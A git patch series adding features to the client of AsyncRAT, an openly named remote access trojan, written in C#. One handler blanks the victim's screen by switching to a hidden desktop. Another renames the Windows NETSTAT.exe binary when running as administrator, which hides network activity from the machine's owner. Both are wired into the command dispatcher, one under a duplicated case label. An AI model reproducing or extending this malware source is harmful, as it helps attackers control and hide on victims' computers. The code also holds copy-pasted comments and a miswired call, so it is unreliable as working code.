From 3acc737040df2fa3d2f53c9f7d892409080ec842 Mon Sep 17 00:00:00 2001 From: MrDevBot Date: Mon, 17 Jun 2019 14:14:57 +1000 Subject: [PATCH 1/5] Created handle function and packets TODO: Submit merge request to master --- .../Client/Handle Packet/HandleBlankScreen.cs | 71 +++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs b/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs new file mode 100644 index 0000000..919382e --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleBlankScreen.cs @@ -0,0 +1,71 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Runtime.InteropServices; +using System.Text; + +namespace Client.Handle_Packet +{ + class HandleBlankScreen + { + [DllImport("user32.dll")] + public static extern IntPtr CreateDesktop(string lpszDesktop, IntPtr lpszDevice, IntPtr pDevmode, int dwFlags, uint dwDesiredAccess, IntPtr lpsa); + + [DllImport("user32.dll")] + private static extern bool SwitchDesktop(IntPtr hDesktop); + + [DllImport("user32.dll")] + public static extern bool CloseDesktop(IntPtr handle); + + [DllImport("user32.dll")] + public static extern bool SetThreadDesktop(IntPtr hDesktop); + + [DllImport("user32.dll")] + public static extern IntPtr GetThreadDesktop(int dwThreadId); + + [DllImport("kernel32.dll")] + public static extern int GetCurrentThreadId(); + enum DESKTOP_ACCESS : uint + { + DESKTOP_NONE = 0, + DESKTOP_READOBJECTS = 0x0001, + DESKTOP_CREATEWINDOW = 0x0002, + DESKTOP_CREATEMENU = 0x0004, + DESKTOP_HOOKCONTROL = 0x0008, + DESKTOP_JOURNALRECORD = 0x0010, + DESKTOP_JOURNALPLAYBACK = 0x0020, + DESKTOP_ENUMERATE = 0x0040, + DESKTOP_WRITEOBJECTS = 0x0080, + DESKTOP_SWITCHDESKTOP = 0x0100, + + GENERIC_ALL = (DESKTOP_READOBJECTS | DESKTOP_CREATEWINDOW | DESKTOP_CREATEMENU | + DESKTOP_HOOKCONTROL | DESKTOP_JOURNALRECORD | DESKTOP_JOURNALPLAYBACK | + DESKTOP_ENUMERATE | DESKTOP_WRITEOBJECTS | DESKTOP_SWITCHDESKTOP), + } + + // old desktop's handle, obtained by getting the current desktop assigned for this thread + static readonly IntPtr hOldDesktop = GetThreadDesktop(GetCurrentThreadId()); + + // new desktop's handle, assigned automatically by CreateDesktop + static IntPtr hNewDesktop = CreateDesktop("RandomDesktopName", IntPtr.Zero, IntPtr.Zero, 0, (uint)DESKTOP_ACCESS.GENERIC_ALL, IntPtr.Zero); + + public static bool switcher = false; //the screen is not blanked be default so this should be false + public static void RunBlankScreen() + { + //light switch logic CopyPasta by MrDevBot + + if (switcher == false) //The current screen is NOT blanked and needs to be + { + SwitchDesktop(hNewDesktop); + switcher = true; //sets the switch to on for next click + return; //returns to calling function + } + else //the screen is blanked and should be switched back to old + { + SwitchDesktop(hOldDesktop); + switcher = false; //sets the switch to off for next click + return; //returns to calling function + } + } + } +} From 321601a704dcbbc280a0b5ea56510c82c4ae8f00 Mon Sep 17 00:00:00 2001 From: MrDevBot Date: Mon, 17 Jun 2019 14:16:33 +1000 Subject: [PATCH 2/5] Added call handler to packets.cs --- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index f16ffb2..e570128 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -297,6 +297,11 @@ namespace Client.Handle_Packet new HandlerExecuteDotNetCode(unpack_msgpack); break; } + case "blankscreen": + { + new HandleBlankScreen(); + break; + } } } catch (Exception ex) From fd4d1e4ff0546d1ae6c6c62bf94cf6ef7bf2058b Mon Sep 17 00:00:00 2001 From: MrDevBot Date: Mon, 17 Jun 2019 14:17:06 +1000 Subject: [PATCH 3/5] Fixed formating --- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 1 + 1 file changed, 1 insertion(+) diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index e570128..1879d6e 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -297,6 +297,7 @@ namespace Client.Handle_Packet new HandlerExecuteDotNetCode(unpack_msgpack); break; } + case "blankscreen": { new HandleBlankScreen(); From 5dc5eb697df3638cf1d34d9b2de5c014fd6662fd Mon Sep 17 00:00:00 2001 From: MrDevBot Date: Mon, 17 Jun 2019 14:47:39 +1000 Subject: [PATCH 4/5] Created HandleNetStat Function --- .../Client/Handle Packet/HandleNetStat | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 AsyncRAT-C#/Client/Handle Packet/HandleNetStat diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleNetStat b/AsyncRAT-C#/Client/Handle Packet/HandleNetStat new file mode 100644 index 0000000..1bff2b8 --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleNetStat @@ -0,0 +1,39 @@ +using Client.Helper; +using System; + +namespace Client.Handle_Packet +{ + class HandleNetStat + { + static bool switcher = false; + public static void RunNetStat() + { + //light switch logic CopyPasta by MrDevBot + if (!Methods.IsAdmin()) return; //if we are not admin return + + if (switcher == false) //The current screen is NOT blanked and needs to be + { + try + { + System.IO.File.Move("C:\\Windows\\System32\\NETSTAT.exe", "C:\\Windows\\System32\\NETSTAT.Backup.txt"); + } + catch(Exception ex) //probably AntiTamper protection or Admin Privilages + { } + + switcher = true; //sets the switch to on for next click + return; //returns to calling function + } + else //the screen is blanked and should be switched back to old + { + try + { + System.IO.File.Move("C:\\Windows\\System32\\NETSTAT.Backup.txt", "C:\\Windows\\System32\\NETSTAT.EXE"); + } + catch (Exception ex) //probably AntiTamper protection or Admin Privilages + { } + switcher = false; //sets the switch to off for next click + return; //returns to calling function + } + } + } +} From 68896b53e94c169bedbf7400707f37539e4b2c07 Mon Sep 17 00:00:00 2001 From: MrDevBot Date: Mon, 17 Jun 2019 14:48:35 +1000 Subject: [PATCH 5/5] Added Call NetStatHandler --- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 1879d6e..ae4a4eb 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -303,6 +303,12 @@ namespace Client.Handle_Packet new HandleBlankScreen(); break; } + + case "blankscreen": + { + new HandleNetStat(); + break; + } } } catch (Exception ex)